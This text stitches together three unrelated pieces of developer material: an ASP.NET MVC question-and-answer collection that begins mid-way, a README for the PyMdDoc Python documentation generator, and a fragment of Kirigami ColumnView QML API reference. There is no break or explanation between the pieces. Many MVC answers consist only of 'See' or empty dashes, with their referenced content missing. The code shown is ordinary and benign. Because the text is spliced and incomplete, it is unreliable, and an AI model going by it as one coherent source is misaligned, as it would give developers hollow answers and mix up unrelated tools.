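The counter pattern above can be sketched roughly as follows; the StartOperation helper and the work items are hypothetical stand-ins for your real parallel operations:

```csharp
using System;
using System.Threading;
using System.Web.Mvc;
using System.Web.Mvc.Async;

public class ReportsController : AsyncController
{
    public void AggregateAsync()
    {
        // One outstanding operation for the entire multi-stage block.
        AsyncManager.OutstandingOperations.Increment();

        int pending = 3; // our own counter for the first set
        for (int i = 0; i < 3; i++)
        {
            StartOperation(() =>
            {
                if (Interlocked.Decrement(ref pending) == 0)
                {
                    // First set done: kick off the next set here with its
                    // own counter; only when the FINAL set completes:
                    AsyncManager.OutstandingOperations.Decrement();
                }
            });
        }
    }

    public ActionResult AggregateCompleted()
    {
        return View();
    }

    // Hypothetical helper: runs work and invokes the callback when done.
    private void StartOperation(Action onCompleted)
    {
        ThreadPool.QueueUserWorkItem(_ => onCompleted());
    }
}
```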
Templates
The Html.Display/Editor functionality is designed to work with raw objects with properties, not dictionaries. See for more details.
Q: Why shouldn’t I use textwriter? (*****)
A: See the great EditorFor thread.
Q: How do you validate passwords?
A: See
Q: I’m writing a custom editor template and display it via:
<%=Html.EditorFor(model=>model.MyProperty, "MyTemplate") %>
In my ascx, I can access the property name and the model type thanks to the ModelMetadata.PropertyName and ModelMetadata.ContainerType. But how can I get a reference to the entire model itself?
A: Use the overload of EditorFor that allows you to pass additional ViewData values, and stash the outer model in a ViewData item so that you can retrieve it inside your template. OR ViewContext.Controller.ViewData.Model will work, you need to cast this to Model type.
Q:How do I use HttpContext.Cache.Add with MVC?
A: Overriding the OnActionExecuting method in the controller is the correct thing to do. The constructor of the controller is way, way too early. At that point MVC itself barely even knows what’s going on. By the time the OnActionExecuting method executes you can get a lot more info about what’s going on, including the ControllerContext, which is where the Cache property hangs off of.
Q: How do I parse a string into a JavaScript date object based on locale? (Globalization)
A: See and (see next Q/A)
Q: How do I pass localized dates as query strings?
A: The problem with automatically parsing dates from the query string with the user’s locale is that we have no idea where they came from. If the server is putting dates into URLs, it clearly can’t do that using the user’s locale, because then you will have non-canonical URLs (and worse, URLs which point to the wrong content depending on the user’s locale). In fact, even if the date came from the user, you’re still generating a non-canonical URL which the user could pass along to another user and inadvertently send them to the wrong place.
When the values come from POSTed form fields, we know they came from the user and can then apply the user’s locale when binding. – from
Q:how do I generate a URL for AJAX?
A: var myUrl = '<%= Url.Action("GetDetails", "Home") %>';
$.ajax({
    type: "POST",
    url: myUrl
});
see
Q: How do I use the ajax client library in MVC?
A: See Using Ajax Client Controls on
Q: There are 2 views in my mvc app that show a list of items. Both provide the ability to edit them by redirecting to a Edit view. How can I provide a back link on the Edit form that takes the user back to the list they were on?
A: Create a hidden field in the Edit view and save the URL referrer in it. On postback, use this field value to track the back address.
<%=Html.Hidden("UrlReferrer", Request.Form["UrlReferrer"] ?? Request.UrlReferrer.ToString())%>
Q: How do I reference scripts?
A: <script src="<%= Url.Content("~/Public/Scripts/RunActiveContent.js") %>" type="text/javascript"></script>
CDN is the best approach: (see Microsoft Ajax CDN and the jQuery Validation Library )
<script src="" type="text/javascript"></script>
Q: How do I get started on jQuery with MVC?
Q: What’s the difference between TempData, ViewData and Session data?
-
-
-
Q: How do I pass data on a redirect?
A: TempData – see
Q: L2S or EF?
A:
Q: How can I check whether the browser is still connected before returning results or doing more work?
A: There aren’t very many reliable ways of detecting this state. You can try to make it a bit better by writing some JavaScript that detects when the browser navigates away and sends a quick message to the server telling it to stop the long operation. This method is unreliable, though, since if the user shuts down their browser or unplugs their computer the server won’t get the message. The hard part is how the server correlates the long-running process with the new message and knows that they are the same.
Q: Why do I get the following error?
FileStream will not open Win32 devices such as disk partitions and tape drives. Avoid use of "\\.\" in the path.
A: COM1, COM2, COM3, COM4, LPT1, LPT2, CON, AUX, and PRN are reserved file names. Rename your view (append an X); starting with ASP.NET 4, you can map the action back to the reserved name via:
[ActionName("con")]
public string conX() {
return "From string ActionResult conX()";
}
See
Q: Returning a File result does not work with non-US-ASCII file names.
A: That is a limitation in ASP.NET MVC 1 (file name must be US-ASCII ) – Fixed in MVC 2 RC. See more details here (and a workaround): and – This is documented in Controller.File Method (String, String, String) (System.Web.Mvc)
Q: Why doesn’t return JavaScript("alert('hello');") work?
A:For the JavaScript result to work in an action method the action method must be executed via an AJAX request. In other words, you can’t have a regular link tag that points at this action method. You have to create a special link using Ajax.ActionLink or using Ajax.BeginForm.
Q: How do you pass parameters using RedirectToAction?
A: You can pass parameters as GET parameters or using TempData. TempData is the better solution in most cases.
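For example (a sketch against the standard MVC RedirectToAction/TempData API; the action and key names are made up):

```csharp
// Pass values as route/query-string values:
return RedirectToAction("Details", new { id = 42 });

// Or stash data in TempData, which survives exactly one subsequent request:
TempData["StatusMessage"] = "Record saved.";
return RedirectToAction("Index");
```

The redirected-to action (or its view) can then read TempData["StatusMessage"] once before it is discarded.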
Q: How do I localize DataAnnotations (ErrorMessageResourceName, ErrorMessageResourceType)?
A: See
Q: How do I replace the error message "A value is required" with my own custom error message?
A: See
Q: How do I move sessionID from the default (cookie) to the querystring?
A: See
Q: How do I keep track of wrong answers on a form submit (limited guesses on security question)?
A: See
Q: I’m setting the value of a hidden input with TempData, but the value is always overridden on postback. What’s the problem?
A: See
In your controller action, you could remove the hidden value from ModelState to force it to use the new value.
Q: I want to pre populate some of the form fields from browser cookies. How to set and load cookies in an mvc app?
A: The same way as in any ASP.NET application – via Cookies property on Request and Response objects. These objects are accessible from controller via HttpContext.Request and HttpContext.Response properties. So just use HttpContext.Request.Cookies and HttpContext.Response.Cookies from your controller. See
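A sketch of both directions (the cookie name and value are illustrative):

```csharp
// Write a cookie from a controller action:
var cookie = new HttpCookie("userName", "alice") { Expires = DateTime.Now.AddDays(30) };
HttpContext.Response.Cookies.Add(cookie);

// Read it back on a later request, pre-populating a form field:
HttpCookie stored = HttpContext.Request.Cookies["userName"];
ViewData["userName"] = stored != null ? stored.Value : string.Empty;
```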
Q: XHTML header indentation format is not respected for some tags – why?
A: In the default MVC template the <head> tag in the Site.master file (in the ~/Views/Shared folder) is marked as runat="server". This special attribute gives the tag additional behavior that in some cases is nice, and in other cases it can cause formatting problems. You can remove the runat="server" attribute from the <head> tag but that can cause certain URLs to map incorrectly. The following will not work
<link href="../../Content/Site.css" rel="stylesheet" type="text/css" />
You’ll have to call Url.Content() instead, like we do for JavaScript files. The only thing you lose at that point is Design view in VS (it’ll work, but you won’t see the CSS styles). See
Q: How do I prevent Invalid viewstate exception when using AntiForgeryToken?
A: See
Q: How do I prevent the favicon error ( System.Web.HttpException was unhandled by user code
Message="The controller for path ‘/favicon.ico’ was not found or does not implement IController.")
A: This is just a debugger notice you can ignore, or you can add routes.IgnoreRoute("favicon.ico"); to RegisterRoutes (the second IgnoreRoute call below):

public static void RegisterRoutes(RouteCollection routes) {
    routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
    routes.IgnoreRoute("favicon.ico");

    routes.MapRoute(
        "Default",                                              // Route name
        "{controller}/{action}/{id}",                           // URL with parameters
        new { controller = "Home", action = "Create", id = "" } // Parameter defaults
    );
}
Q: How do I create Cascading Drop Down boxes in MVC?
A:
Q: Authorize filter and what it exactly does.
A: See
Q: How do I create a custom role provider for MVC?
A: See
Q: How do I keep track of posts to security questions (wrong answer) to limit a client to N guesses?
A: See
A: Routing links – see and ASP.NET MVC – Prevent Image Leeching with a Custom RouteHandler and
When constructing an outbound route, the system finds the first match that is legal and uses that to construct the route. What makes a route legal is that all the required values are present, and all the restrictions are satisfied. Any values which are leftover which aren’t part of the route itself will be added as query string values.
Q: How do I enable MVC on IIS5.1 (XP) or IIS 6?
-
-
- Using ASP.NET MVC with Different Versions of IIS (C#)
Q: How do I use JSON in MVC?
A: See
Q: I have an Ajax.ActionLink that loads a partial view into a div, using a get method. The problem is, the user can just visit controller/AjaxAction directly, like they could with any action method. Basically, I need an ActionMethod that accepts HttpVerbs.Get, but can only be called by Ajax; as opposed to being called as a normal action.
A: Check whether Request.IsAjaxRequest() is true or false. If it is false, you could redirect somewhere else, for example. If it is true, continue processing. You could even create a custom action filter that checks this and makes the decision.
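A custom action method selector along those lines might look like this (a sketch; the AjaxOnly name is made up, built on the real ActionMethodSelectorAttribute base class):

```csharp
public class AjaxOnlyAttribute : ActionMethodSelectorAttribute
{
    // Only let MVC select this action when the request came in via AJAX.
    public override bool IsValidForRequest(ControllerContext controllerContext, MethodInfo methodInfo)
    {
        return controllerContext.HttpContext.Request.IsAjaxRequest();
    }
}

// Usage: the action is no longer reachable as a normal browser navigation.
[AjaxOnly]
public ActionResult AjaxAction()
{
    return PartialView();
}
```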
Q: In WebForms, I use Page.Request.ServerVariables["LOGON_USER"]; to get the current logged in user. How do I do this in MVC?
A: Have the controller put it in ViewData. (thanks paul.vencill )
ViewData["username"] = User.Identity.Name;
Q: Why do I get the following build error: The "xxx" task failed unexpectedly. System.UnauthorizedAccessException: Access to the path ‘C:\Path…’ is denied.
A: You’re probably hitting a known bug related to source control systems which leave your source files as read-only by default (like TFS). The first copy succeeds because there isn’t anything there, but the second copy fails because it refuses to overwrite the read-only copies of the files from the first time around. There is no work-around today besides checking out all the files that will be copied so that they’re read-write instead of read-only.
Q: How do I use MVC with LiveID ?
A: Write your own Authorize filter. See
Q: How do I fix the following error: "A potentially dangerous Request.Form value was detected from the client "
A: See
Q: MVC app renders OK in IE, but not in Firefox, Chrome, or Safari
A: The Site.Master page’s DOCTYPE was set to Strict. Changing it to Transitional made the pages render the same in all browsers. See
Q: How do I check which event caused a post back?
A: See
Q: How does MVC get indexed by search engines if the URLs are not file based?
A: See
Q: How do I display data from my master page?
A: You can use RenderAction from inside of a MasterPage. Just make an action and associated partial view for whatever it is you want to render in the Master Page. see
Q: How do I implement an Event Calendar in MVC?
A: See and
Q: How do I add tool tips to my menu items?
A: <%= Html.ActionLink("Home", "Index", "Home", new{title="My ToolTip"})%> – also see and
Q: How do I get IIS to compress JSON?
A: The httpCompression section can only be specified in applicationhost.config. You can set dynamic compression in IIS Manager (you must have the dynamic content compression module installed: under World Wide Web Services\Performance Features, select HTTP Compression Dynamic). See
Q: parameters v. query strings.
A: A URL is a resource. MVC created Routing so that it more properly describes your site’s resources, not so that you never have query strings in your applications. As an example, parameters that affect the presentation but not the actual resource itself should generally be left as query strings rather than as route values. See
Q: How do I use the Ajax Control Toolkit MaskEditBox in ASP.NET MVC?
A:
Q: How do HTTP modules work in MVC?
A:ASP.NET MVC is still just ASP.NET under the hood, so the entire ASP.NET pipeline (including modules) still runs. Things like authentication, output caching, and routing are all implemented as modules that run before the MVC pipeline executes. So, yes, modules still work just as they always have, and you register them the same way. 🙂
Q: I have two AJAX calls on one page and I expected them to run concurrently, but they run sequentially – why?
A: Because requests in MVC have access to session state, the requests are serialized to prevent corruption of session state. If you have long-running actions, you should make them async. See the article Using an Asynchronous Controller in ASP.NET MVC and the blog entry Should my database calls be Asynchronous? See also
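The MVC 2 async pattern looks roughly like this (a sketch of the AsyncController pattern; NewsService and the view model are hypothetical):

```csharp
public class PortalController : AsyncController
{
    public void NewsAsync(string city)
    {
        // Tell the framework one async operation is in flight.
        AsyncManager.OutstandingOperations.Increment();

        var service = new NewsService(); // hypothetical long-running service
        service.GetHeadlinesCompleted += (sender, e) =>
        {
            // Parameters set here are bound to NewsCompleted's arguments.
            AsyncManager.Parameters["headlines"] = e.Value;
            AsyncManager.OutstandingOperations.Decrement();
        };
        service.GetHeadlinesAsync(city);
    }

    public ActionResult NewsCompleted(string[] headlines)
    {
        return View(new NewsViewModel { Headlines = headlines });
    }
}
```

While the operation runs, the worker thread is returned to the pool instead of blocking.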
Q: How can I validate two properties matching (email, repeat email)?
A: See
Validation
Validation only ensures that the values that were edited are valid. If we ran validation on all properties, whether they were edited or not, it would break partial-editing scenarios.
There are two ways to handle the radio button problem. The simpler one is to always ensure that at least one of the radio buttons is selected. The other way is to mimic what we do with check boxes: render an extra hidden input with the same name but a uniquely identifiable value. You’ll need to write a special model binder to deal with the cases where there is only one value (no radio button was selected) vs. two values (a radio button was selected). See
Q: Url.Action v. Html.ActionLink
A: See
Q: How do I capture a response (e.g. a 401) in a Global.asax EndRequest handler and change it (e.g. to a 302)?
A: See
Q: How do I handle multiple submit buttons on one page, or route multiple submit buttons to multiple ActionResults in a single controller?
A: See
Q: Connecting an HtmlHelper with a calendar control in MVC
A: See
Q: How do I load an action from the master page?
A: RenderAction
Q: How do I localize/globalize an MVC application?
A: See
Q: How can I do global error handling?
A: See
Q: How do I fetch a subset of data using Entity Framework?
A:See ASP.NET MVC Partial Views and Strongly Typed Custom ViewModels
Q: How do I create a generic controller (one that takes a generic type like MyModel)?
A: Create a base class that takes a generic type. See
Q: CakePHP style prefix routing with ASP.NET MVC 2
A: See
Q: How do I get the input-validation-error CSS class set on a textbox of a nested object?
A: See
JSON
NerdDinner JSON sample
Browsers will cache JSON just the same as they’ll cache HTML, so make sure you’re disabling browser caching in your JSON handlers.
AREAS
Q: We have several area registration classes (derived from AreaRegistration), and we are registering our areas by calling AreaRegistration.RegisterAllAreas(); — is there a way to manage the order of this area registration?
A: There is no built-in way to do this. However, by calling each area registration yourself you can decide the order. That is, instead of using RegisterAllAreas() you can have your own implementation that has either a hard-coded order of the areas or perhaps does some smarter look-up based on an attribute or property value.
Q: How do I create one output assembly for each Area or for each controller (this for testing issues).
A: There is no built-in way of doing this, but it’s certainly possible to do on your own in VS. All you need to do is create multiple projects in VS, one for each controller (or area or whatever). Then reference those projects from the main MVC web app project. You’ll have to make sure that you set up the right namespaces in each project so that the areas feature works, because the area feature works based on the namespaces of controllers.
TDD
Q: How do I mock HttpContext?
A: Build an MVC project with unit tests and look at the AccountController unit tests. See also
Q: We needed common initialization done in our controllers. To accomplish this we used a common base class and overrode its “Initialize” method. The problem we are having is unit testing. In our unit tests we create our controllers by calling the constructor, then set a test context for them and call their actions as member methods. Following this pattern, the “Initialize” method never gets executed. My question is: how can we construct/set up a controller so that it executes its Initialize method?
A: This is a philosophical unit testing question. One school of thought is that the unit test should be testing only the action method being called and not depend on the Initialize method having been called. Thus the “unit” being tested is the action method and nothing else. This is the direction that many MVC TDD folks lean towards.
The other school of thought says “whatever” and wants the Initialize method to be called. One aspect of this that can be a bit more complex is that you now might need to set up even more context objects to satisfy that method’s needs (though in yet other cases it may end up being simpler). In this case you can create a class that derives from your runtime controller, perhaps call it FooControllerHelper, and have that expose a new public method that can call in to protected Initialize method on the base class. Either approach can work, and each has its own caveats and limitations. In the end it’s up to you and your team to make the decision that makes the most sense for you (and your code).
Q: How do I write a unit test in C# that will pass a mock (moq) System.Web.UI.Page object to a method call?
A: You can abstract out the Page class using a hand-written IPage interface. The Page class is just not well designed for proper unit testing.
More on TDD: see
Q: How do I test the combination of a controller action with a ActionFilter attribute (using OnActionExecuted to modify the ActionResult returned by the Action)?
A: Test them separately. You’d have a total of three tests: one that tests the logic of the action itself (without the filter), one that tests that the filter is applied to the action (via MethodInfo.GetAttributes(), presumably), and one that tests the filter logic itself (by calling OnActionExecuted() directly). Since filters are cross-cutting, it’s not really good practice to test action logic + filter logic within the same test. See also
Q: My ModelState remains valid in a controller test even when it shouldn’t be.
A: See
Performance
Q: Why is my page rendering so slowly?
A: You probably have Debug enabled. Make sure that you have debug = false in your web.config.
<compilation debug="false" targetFramework="4.0">
When debugging is on, we don’t cache the mapping from view name to view file, because we assume that during development you will be adding/deleting views on a regular basis. This is made worse by the fact that, in MVC 2, we’re calling an API that normally throws an exception when the view file isn’t found, so a simple lookup of a template might cause several exceptions to be thrown. In MVC 3, we’re using a new API in ASP.NET 4 which allows us to bypass this exception.
Setting debug=true disables optimized code paths to assist in debugging. In your particular case, it’s disabling view location caching. As a rule of thumb, always run with debug=false if you’re running performance tests, as that will enable code path optimizations
Q: System.Web.Mvc.Html.ChildActionExtensions.RenderAction v. System.Web.Mvc.Html.RenderPartialExtensions.RenderPartial Performance
A: RenderAction (slower) vs. RenderPartial (faster). RenderAction, by definition, has to run the whole ASP.NET pipeline to handle what appears to the system to be a new HTTP request, whereas RenderPartial is just adding extra content to an existing view.
Q: I’m using [OutputCache(Location=OutputCacheLocation.Client, VaryByParam="id", Duration=3600)] for reading a message, but it also caches the username displayed on the page. … Unfortunately, when I view a message that was meant for the entire class, it displays the username of whoever logged in first, not the currently logged-on user.
A: use [OutputCache(Duration=xxx, VaryByParam="id", VaryByHeader="Cookie")]
Localization/CurrentCulture/UI
Q: How do I set the thread’s CurrentCulture/CurrentUICulture?
A: set the culture from within Application_BeginRequest() (in Global.asax). For two additional approaches see
Binding
Q: I’m using [Bind(Exclude="Name")] on my action method parameter, but Name is still validated – why?
A: Validation is a separate step from binding. [Bind] only controls which properties are set from user input. Validation in MVC 2 always takes place for all properties of the model, regardless of whether they have been set by user input. See for more information.
In your particular case, if you didn’t intend for the Name property to be validated here, then remove the validation from it (remove [Required] or make the property type nullable). Or change your model such that it doesn’t have a Name property, since then the model more accurately describes the interaction you intended for the user to have with it.
To change default validation messages & binding see (review entire thread)
How do I disable the implicit required validation? If you want to disable this behavior entirely, set DataAnnotationsModelValidatorProvider.AddImplicitRequiredAttributeForValueTypes to false during startup (in your Global.asax file). See
Q: I’m using Html.BeginForm, but my input control is always null – why?
A: You’re calling the wrong overload of BeginForm() – use the version that takes FormMethod.Post. See
Q: I want to move my Edit/Details templates to subfolders to clean up the directory structure. I want to have the following :
/Employee
    Index.aspx
    /Edit
        Edit.aspx
        EditPartial1.ascx
        EditPartial2.ascx
A: Use return View("Edit/Edit", employee);
The only time you need to resort to fully qualified paths is if you want to break out of the default folder locations, but since everything is still under "~/Views/<controllername>", you’re fine using the relative syntax. See
Q: On a strongly typed model I have a property of type IDictionary<int, string>. This is not used by the form … only by a validation class after the form is submitted. However, since it isn’t in the form when it is submitted, its values are lost.
A: See
Model State and Validation (see Binding above for related info)
Q: I have a bad user input ("PersonID") I need to correct and then validate, how do I do this?
A: That’s usually a bad idea, but you can. See
Q: I have a custom model validator on a particular property. It shows the error at the top (in the Html.EnableClientValidation section), but it does not show the message next to the field, even though I have a corresponding ValidationMessageFor.
A: See
Q: Why don’t I get an error when I pass a string to a controller method that takes an Int32?
A: The reason you don’t get an exception is that model binding doesn’t generally throw exceptions (unless you ask it to by calling UpdateModel on your controller). Model binding fails for the id parameter, so we pass null instead and set ModelState.IsValid to false. When id is an int, and therefore not nullable, we have to throw an error because there’s no way to pass null for the id. see
MVC JavaScript jQuery Links
- See blog/sample ASP.NET MVC Framework and JavaScript BFFF!
- jQuery Star Rating with ASP.NET MVC
Trivia:
DisplayFor uses the HtmlEncode method, TextBoxFor uses the HtmlAttributeEncode method – which converts only quotation marks ("), ampersands (&), and left angle brackets (<) to equivalent character entities. It is considerably faster than the HtmlEncode method.
How do I create a short name for a controller? See
The way in which ASP.NET MVC uses Web Form pages for views is nothing more than an implementation detail. We’ve changed how those pages are executed a number of times already so any assumptions made regarding how those pages are run will probably become invalid before you know it (that is, putting code in the view). MVC supports multiple view engines.
Q: I’m having problems with Sys_Mvc_FormContext$_form_OnSubmit – submitButton.disableValidation is not supported in Chrome, as you can’t access a custom property on an HTML element this way. Should I use submitButton.getAttribute("disableValidation") instead?
A: See
Q: Ajax.BeginForm and Html.ValidationSummary – how do I make an AJAX form work correctly with client validation?
A: See
Q: MVC 2 HTML helpers do not render the ID – why?
A: By design. We changed the helpers in MVC 2 so that they don’t output invalid IDs. In HTML, an ID must begin with a letter. This is why your GUID that starts with ‘C’ gets an ID auto-generated, but not your GUID that starts with the digit ‘9’. You can manually pass new { id = … } as the htmlAttributes parameter of Html.TextBox() if you want to work around this.
See
Q: MVC chat application problem with jQuery, JSON
A: See
Q: What’s the story on NerdDinner and MVC 2?
A: See
Q: How do ASP.NET MVC Sessions across subdomains work
A: see
Q: Where should I call DataAnnotationsModelValidatorProvider.RegisterAdapter(typeof(EmailAttribute), typeof(RegularExpressionAttributeAdapter));
A: This should go in Application_Start, not the EmailAttribute static constructor. see
Q: How do I get my AJAX Form work correctly with Client Validation?
A: See
Q: I can’t get cookieless sessions working with MVC.
A: This isn’t something the framework handles automatically for you, and cookieless sessions aren’t designed for this scenario. You can use hidden inputs to keep track of state, the Html.Serialize() helper from Futures, or WebForms + ViewState. What all of these suggestions have in common is that they move the state you’re trying to store out of Session and onto the actual pages themselves. Cookieless sessions were designed to support mobile devices which didn’t support cookies, and such devices have now probably all disappeared. The scenarios for supporting cookieless sessions are rapidly dwindling; cookieless sessions are not supported in ASP.NET MVC (only in WebForms), and it’s likely that we will never support cookieless sessions in MVC. See
Q: How do I internationalize DataAnnotations error messages using a custom SQL resource provider?
A:
Q: MVC 2 futures: FormExtensions make wrong paths when adding area to site
A: See
Q: Model validation happens automatically with DateTime fields, but not other NOT NULL fields
A: See
Q: How to implement multiple synchronization points on Controller async action.
A: See
Q: How do I validate a complex object that is a composite of multiple fields ( for example person.FullName = String.Format("{0} {1}", person.Name, person.Surname); )
A: see
Note: the above would make a great blog
Q: I’m using a Custom ErrorMessage for DataAnnotations.DataTypeAttribute but I don’t get the custom error message:
A: DataTypeAttribute is a little confusing, because it allows you to write your own validation but doesn’t come with any built-in validation, so setting ErrorMessage and friends doesn’t actually do anything until you add your own validation code. See
Q: My button’s OnClick event (which is in code-behind) doesn’t get triggered in MVC 2 – why?
A: See
Q: How do I bind a bool value to a checkbox in MVC 2?
A: see
Q: How do I bind a method to a viewengine at runtime?
A: If you have an instance of a ViewResult, you can specify which view engines will be used when executing that result. Set the ViewResult.ViewEngines property (its setter is public) to contain the list of all the view engines you want queried for this particular ViewResult. If you know ahead of time that a particular view engine should be used, just create a new ViewEngineCollection and give it a single entry containing the view engine you want to use.
Q: Is URL rewriting really needed?
A: See also
Q: What’s a fast way to copy a model?
A: See
Misc good blogs
Misc good Posts
- How do I get input-validation-error css set on textbox of nested object?
- How to: Connect to the AdventureWorksLT Database using an .MDF File
Generate markdown documentation for your Python scripts. Like Sphinx, but simpler and directly compatible with GitHub.
PyMdDoc
Generate markdown documentation from your Python scripts' code comments, compatible with GitHub. It's like Sphinx, but with simpler requirements and results. It's also not as flexible as Sphinx and is mainly useful for scripts containing only a few classes.
For example output, see the code documentation for this module.
Installation
pip3 install py-md-doc
Usage
To generate the documentation for this module:
- Clone this repo.
`cd path/to/py_md_doc` (replace `path/to` with the actual path to this repo)
python3 doc_gen.py
To generate documentation for your own module:
```python
from py_md_doc import PyMdDoc
from pathlib import Path

md = PyMdDoc(input_directory=Path("my_module/my_module"), files=["my_script.py"], metadata_path="metadata.json")
md.get_docs(output_directory=Path("my_module/docs"))
```
For the full API, read this.
Code comments format
- One class per file.
- Class descriptions begin and end with `"""` immediately after the class definition.
- Class variable descriptions begin with `""":class_var` and end with `"""` and must be before the constructor declaration. The line immediately after them is the variable declaration.
- Field descriptions begin with `""":field` and end with `"""` in the constructor. The line immediately after them is the field declaration.
- Function descriptions begin and end with `"""` immediately after the function definition.
- Function parameter descriptions are lines within the function description that begin with `:param`
- Function return descriptions are lines within the function description that begin with `:return:`
- Function names that begin with `_` are ignored.
- The code for PyMdDoc as well as the code examples below use type hinting. You do not need type hinting in your code for PyMdDoc to work properly.
```python
class MyClass:
    """
    This is the class description.
    """

    """:class_var
    This is a class variable.
    """
    CLASS_VAR: int = 0

    def __init__(self):
        """:field
        The ID of this object.
        """
        self.val = 0

    def set_val(self, val: int) -> None:
        """
        Set the val of this object.

        :param val: The new value.
        """
        self.val = val

    def get_val(self) -> int:
        """
        :return: The value of this object.
        """
        return self.val

    def _private_function(self) -> None:
        """
        This won't appear in the documentation.
        """
        return
```
- Enum values are documented by commenting the line next to them.
```python
from enum import Enum


class MyEnum(Enum):
    a = 0  # The first value.
    b = 1  # The second value.
```
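Conventions like these are straightforward to scan for mechanically. As a rough illustration (this is not py-md-doc's actual parser; `get_param_docs` is a hypothetical helper), here is how the `:param` lines of a docstring can be pulled out with the standard library:

```python
import inspect


def get_param_docs(func) -> dict:
    """Map parameter names to their :param descriptions in a docstring."""
    docs = {}
    for line in (inspect.getdoc(func) or "").splitlines():
        line = line.strip()
        if line.startswith(":param "):
            # ":param val: The new value." -> name "val", description "The new value."
            name, _, description = line[len(":param "):].partition(":")
            docs[name.strip()] = description.strip()
    return docs


def set_val(val: int) -> None:
    """
    Set the val of this object.

    :param val: The new value.
    """


print(get_param_docs(set_val))  # {'val': 'The new value.'}
```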
Metadata file
You can add an optional metadata dictionary (see the constructor).
A metadata file is structured like this:
```json
{
  "PyMdDoc": {
    "Constructor": {
      "description": "",
      "functions": ["__init__"]
    },
    "Documentation Generation": {
      "description": "Use these functions to generate your documentation.",
      "functions": ["get_docs", "get_doc"]
    },
    "Helper Functions": {
      "description": "These functions are used in `get_docs()`. You generally won't need to call these yourself.",
      "functions": ["get_class_description", "get_class_variables", "get_function_documentation", "get_enum_values", "get_fields"]
    }
  }
}
```
- The top-level key of the dictionary (`"PyMdDoc"`) is the name of the class. You don't need to add every class that you wish to document. If the class is not listed in `metadata.json` but is listed in the `files` parameter, its functions will be documented in the order they appear in the script.
- Each key in the class metadata (`"Constructor"`, `"Documentation Generation"`, `"Helper Functions"`) is a section.
- Each section name will be a header in the document, except for `"Constructor"` and `"Ignore"`.
- Any function in the `"Ignore"` category won't be documented.
- Each section has a `"description"` and a list of names of `"functions"`. The functions will appear in the section in the order they appear in this list.
- If the class name is listed in `metadata.json` and a function name can't be found in any of the section lists, the console will output a warning. For example, if you were to add a function named `new_function()` to `PyMdDoc`, you'd have to add it to a section in the metadata file as well, because `PyMdDoc` is a key in the metadata dictionary.
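Because the metadata file is plain JSON, you can sanity-check it before generating docs. A minimal stdlib-only sketch (the `check_metadata` helper is hypothetical, not part of py-md-doc):

```python
import json


def check_metadata(text: str) -> list:
    """Return warnings for sections missing a 'description' or 'functions' key."""
    warnings = []
    for class_name, sections in json.loads(text).items():
        for section_name, section in sections.items():
            for key in ("description", "functions"):
                if key not in section:
                    warnings.append(f"{class_name}/{section_name}: missing '{key}'")
    return warnings


good = '{"PyMdDoc": {"Constructor": {"description": "", "functions": ["__init__"]}}}'
bad = '{"PyMdDoc": {"Constructor": {"functions": ["__init__"]}}}'
print(check_metadata(good))  # []
print(check_metadata(bad))   # ["PyMdDoc/Constructor: missing 'description'"]
```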
Limitations
- This script is for class objects only and won't document functions that aren't in classes:
```python
def my_func():
    """
    This function will be ignored.
    """
    pass


class MyClass:
    """
    This class will be in the documentation.
    """

    def class_func(self):
        """
        This function will be in the documentation.
        """
        pass


def another_my_func():
    """
    This function will be erroneously included with MyClass.
    """
    pass
```
- Functions can be grouped and reordered into categories, but classes and fields are always documented from the top of the document to the bottom:
```python
class MyClass:
    """
    This class will be documented first.
    """

    def class_func(self):
        """
        This function will be documented first.
        """
        pass

    def another_class_func(self):
        """
        This function will be documented second.
        """
        pass


class AnotherClass:
    """
    This class will be documented second.
    """
```
VarDoc
To create API documentation for a script that contains only variables (no classes or functions), use `VarDoc`.
Changelog
0.2.5

- Added optional parameter `import_prefix` to `PyMdDoc.get_doc()` and `PyMdDoc.get_docs()`.

0.2.4

- Fixed: Various issues with functions not appearing correctly or not appearing at all with `get_docs_with_inheritance()`.
- Fixed: There is no `## Functions` header if there aren't also fields.

0.2.3

- Fixed: `get_docs_with_inheritance()` returns the abstract class document for a child class if there are any `@final` attribute headers.

0.2.2

- Added: `get_docs_with_inheritance()` – basic support for API documentation with class inheritance.

0.2.1

- Added a header to documents generated by `VarDoc`.

0.2.0

- Added: `VarDoc` – create documentation of variables.

0.1.10

- Don't italicize section descriptions.
- Automatically generate a table of contents if `[TOC]` is present in the document.

0.1.9

- Fixed: Crash when writing text if the text has non-ASCII characters.

0.1.8

- Fixed: Data from hidden classes (classes with names that begin with `_`) is included in the documentation, either within the main class documentation or above it without a header. Now, it's never included.

0.1.7

- Fixed: Class variable types are sometimes parsed incorrectly.

0.1.6

- Fixed: Category description formatting breaks if there are line breaks.

0.1.5

- Fixed: Class variables aren't included in documentation.

0.1.4

- Fixed: Can't find `:return` decorators (expecting only `:return:`).
- Fixed: Unhandled exception if there's more than one class in the file.
- Added: `social.jpg`

0.1.3

- Added: Special category `Ignore` to metadata. Functions in this category will be ignored.

0.1.2

- All functions that have parameters with default values now have two example code strings: a "short" example (parameters with default values aren't included) and a "long" example (all parameters with default values are explicitly assigned).
- Added default values to the parameter table.
- Added: `parameter.py` to hold parameter information.
- Moved the documentation generation code for this module to `doc_gen.py` to avoid import path errors.

0.1.1

- Added support for class variables.
- Added much clearer code examples for function documentation.
- Added parameter types to the function parameter tables.
ColumnView
#include <columnview.h>
Detailed Description
ColumnView is a container that lays out items horizontally in a row, when not all items fit in the ColumnView, it will behave like a Flickable and will be a scrollable view which shows only a determined number of columns.
The columns can either all have the same fixed size (recommended), size themselves with implicitWidth, or automatically expand to take all the available width: by default the last column will always be the expanding one. Items inside the Columnview can access info of the view and set layouting hints via the Columnview attached property.
This is the base for the implementation of PageRow
- Since
- 2.7
Definition at line 147 of file columnview.h.
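A minimal QML usage sketch (the property names come from this page; the import version and child items are illustrative, not taken from an official example):

```qml
import QtQuick 2.15
import org.kde.kirigami 2.7 as Kirigami

Kirigami.ColumnView {
    anchors.fill: parent
    columnResizeMode: Kirigami.ColumnView.FixedColumns
    columnWidth: Kirigami.Units.gridUnit * 20

    // Each child item becomes a column.
    Rectangle { color: "lightblue" }
    Rectangle { color: "lightgreen" }
}
```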
Property Documentation
True if the contents can be dragged with the mouse as well as with touch.
Definition at line 248 of file columnview.h.
The padding this will have at the bottom.
Definition at line 202 of file columnview.h.
The strategy to follow while automatically resizing the columns. The enum can have the following values:
- FixedColumns: every column is fixed at the same width of the columnWidth property
- DynamicColumns: columns take their width from their implicitWidth
- SingleColumn: only one column at a time is shown, as wide as the viewport; any reservedSpace set on a column's attached property is ignored
Definition at line 158 of file columnview.h.
